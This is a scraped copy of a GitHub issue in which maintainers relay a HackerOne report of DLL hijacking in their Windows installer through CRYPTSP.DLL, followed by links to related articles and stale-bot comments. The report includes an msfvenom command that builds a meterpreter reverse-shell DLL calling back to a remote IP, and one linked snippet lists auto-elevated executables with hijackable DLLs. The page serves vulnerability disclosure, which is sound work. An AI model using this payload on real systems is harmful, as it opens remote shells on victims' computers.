DLL Hijacking In Windows Installer
See original GitHub issue- Version:
^20.25.0
- Target:
--win --x64 --ia32
We received the following report for a security researcher on HackerOne about our application. I am not sure if it is valid, but here is what was reported:
I would like to report that the xxxxx-installer.exe is vulnerable to DLL highjacking on the following library:
C:\Windows\SYSTEM32\CRYPTSP.DLL
In order to recreate the issue, simply generate a malicious DLL using metasploit with the following command: “msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.123.12.3 LPORT=4444 -f DLL >CRYPTSP.DLL” and place the malicious DLL in the same folder as where the installation executable will be run from on the client machine.
This was tested on a fully patched Windows 7 professional client.
Impact RCE on the client computer
Issue Analytics
- State:
- Created 5 years ago
- Reactions:6
- Comments:6
Top Results From Across the Web
Windows DLL Hijacking (Hopefully) Clarified - itm4n's blog
An arbitrary file write vulnerability opens up many opportunities for DLL hijacking because you are not limited to the %PATH% directories ( ...
Read more >Installer Vulnerability Update
A vulnerability in all Windows OSes allows a malicious DLL to hijack your EXE installer upon launch. While the EXE shows your legitimate...
Read more >Hijacking DLLs in Windows
Auto‑elevated Executable DLL Procedure
✔️ bthudtask.exe DEVOBJ.dll DllMain
✔️ computerdefaults.exe CRYPTBASE.DLL DllMain
✔️ computerdefaults.exe edputil.dll DllMain
Read more >Dll Hijacking - HackTricks
Dll hijacking can be used to execute code, obtain persistence and escalate privileges. From those 3 the least probable to find is privilege...
Read more >Almost 300 Windows 10 executables vulnerable to DLL ...
The vulnerability referred to here is relative path DLL hijacking, which is when an attacker can cause a legitimate Windows executable to ...
Read more >Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start FreeTop Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
Top GitHub Comments
Still an open issue.
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.